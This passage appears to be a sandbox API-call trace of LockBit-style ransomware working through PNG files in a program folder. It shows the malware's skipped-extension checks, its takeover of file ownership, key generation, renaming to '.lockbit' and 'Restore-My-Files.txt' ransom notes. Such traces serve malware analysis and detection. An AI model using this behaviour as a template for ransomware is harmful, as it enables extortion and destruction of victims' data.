lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.411] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.411] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.412] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.412] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-highlight.png") returned 1 [0079.412] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-highlight.png") returned 1 [0079.412] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-highlight.png") returned 1 [0079.412] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-highlight.png") returned 1 [0079.413] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-highlight.png") returned 1 [0079.413] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-highlight.png") returned 1 [0079.413] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-highlight.png") returned 1 [0079.413] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.413] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned=".png" [0079.413] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.413] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.413] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.414] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.414] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.414] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.414] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png.lockbit") returned 86 [0079.414] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.415] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.415] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.415] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.415] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.415] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.415] RtlFreeAnsiString (AnsiString="\\") [0079.415] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.415] malloc (_Size=0x200) returned 0x77d800 [0079.415] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.416] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.416] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.416] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.416] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.416] CloseHandle (hObject=0x3c4) returned 1 [0079.416] free (_Block=0x77d800) [0079.416] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.416] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.416] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.416] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2211) returned 1 [0079.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.417] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.426] malloc (_Size=0xc2) returned 0x1ff1e60 [0079.426] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0079.426] free (_Block=0x1ff1e60) [0079.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.427] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.427] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.427] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7287ed72, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7287ed72, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0079.427] lstrcmpiW (lpString1=".", lpString2="16_9-frame-image-mask.png") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="16_9-frame-image-mask.png") returned -1 [0079.427] PathFindExtensionW (pszPath="16_9-frame-image-mask.png") returned=".png" [0079.427] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.427] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.427] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.428] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.428] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.429] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-image-mask.png") returned 1 [0079.429] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.429] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned=".png" [0079.429] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.429] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.429] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.429] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.430] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.430] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.430] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.lockbit") returned 87 [0079.430] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.431] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.431] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.431] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.431] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.431] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.431] RtlFreeAnsiString (AnsiString="\\") [0079.432] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.432] malloc (_Size=0x200) returned 0x77d800 [0079.432] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.432] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.432] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.432] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.432] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.432] CloseHandle (hObject=0x3c4) returned 1 [0079.432] free (_Block=0x77d800) [0079.432] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.433] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.433] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.433] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1551) returned 1 [0079.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.434] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.441] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.441] malloc (_Size=0xc4) returned 0x1ff1e60 [0079.441] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0079.441] free (_Block=0x1ff1e60) [0079.441] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.441] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.441] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.441] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72832ab8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72832ab8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4c15, dwReserved0=0x0, dwReserved1=0x0, cFileName="babypink.png", cAlternateFileName="")) returned 1 [0079.441] lstrcmpiW (lpString1=".", lpString2="babypink.png") returned -1 [0079.441] lstrcmpiW (lpString1="..", lpString2="babypink.png") returned -1 [0079.441] PathFindExtensionW (pszPath="babypink.png") returned=".png" [0079.441] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.442] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.442] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.442] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.442] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.443] lstrcmpiW 